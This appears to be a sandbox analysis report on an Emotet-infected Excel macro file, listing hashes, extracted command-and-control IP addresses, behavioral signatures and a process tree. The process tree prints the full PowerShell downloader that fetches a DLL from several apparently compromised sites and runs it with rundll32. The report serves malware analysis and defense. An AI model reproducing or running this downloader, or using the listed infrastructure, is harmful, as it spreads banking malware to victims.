Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

8656632045...1.xlsm

windows10_x64

10

Resubmissions

24/11/2021, 17:59

211124-wk8rgsddbm 10

22/11/2021, 14:46

211122-r5n6csagd6 10

22/11/2021, 14:46

211122-r5csbsfgdp 10

22/11/2021, 14:44

211122-r4kfsafgdn 10

22/11/2021, 14:41

211122-r2x9vsfgcq 10

22/11/2021, 14:20

211122-rneklaffgr 10

22/11/2021, 14:15

211122-rkk8zaffgl 10

17/11/2021, 06:51

211117-hm1l1aeefm 10

17/11/2021, 06:37

211117-hdnk3seedn 10

Analysis

  • max time kernel
    49s
  • max time network
    57s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    17/11/2021, 06:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    865663204559_17_Nov_2021.xlsm

  • Size

    44KB

  • MD5

    477fd718bb764ffe3c5afde16c6c8dd2

  • SHA1

    eb932e19d95f88d64270d40cdc0b92c6d1cf63be

  • SHA256

    ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3

  • SHA512

    f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267

Score
10/10
emotetepoch4bankersuricatatrojan

Malware Config

Extracted

Family

emotet

Botnet

Epoch4

C2

91.200.186.228:443

191.252.196.221:8080

94.177.248.64:443

66.42.55.5:7080

103.8.26.103:8080

185.184.25.237:8080

103.8.26.102:8080

178.79.147.66:8080

58.227.42.236:80

45.118.135.203:7080

103.75.201.2:443

195.154.133.20:443

45.142.114.231:8080

212.237.5.209:443

207.38.84.195:8080

104.251.214.46:8080

212.237.17.99:8080

212.237.56.116:7080

216.158.226.206:443

110.232.117.186:8080
eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)

    suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)

    suricata
  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata
  • Blocklisted process makes network request 16 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\865663204559_17_Nov_2021.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3152
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4744
        • C:\Windows\SysWow64\rundll32.exe
          "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\37926850.dll,f1541763150
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:4336
          • C:\Windows\SysWOW64\rundll32.exe
            C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\37926850.dll",Control_RunDLL
            5⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:3768
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vhhcsaycitojwot\zymfkff.jad",bgoHsrDVNbITvy
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1220
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Vhhcsaycitojwot\zymfkff.jad",Control_RunDLL
                7⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                PID:3788

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3152-120-0x000002713B700000-0x000002713B702000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3152-119-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3152-122-0x000002713B700000-0x000002713B702000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3152-115-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3152-116-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3152-117-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3152-118-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3152-121-0x000002713B700000-0x000002713B702000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4336-340-0x0000000010000000-0x0000000010028000-memory.dmp

    Filesize

    160KB

    Download

  • memory/4744-310-0x0000024913CB8000-0x0000024913CB9000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4744-294-0x0000024913CB6000-0x0000024913CB8000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4744-292-0x0000024913CB0000-0x0000024913CB2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4744-293-0x0000024913CB3000-0x0000024913CB5000-memory.dmp

    Filesize

    8KB

    Download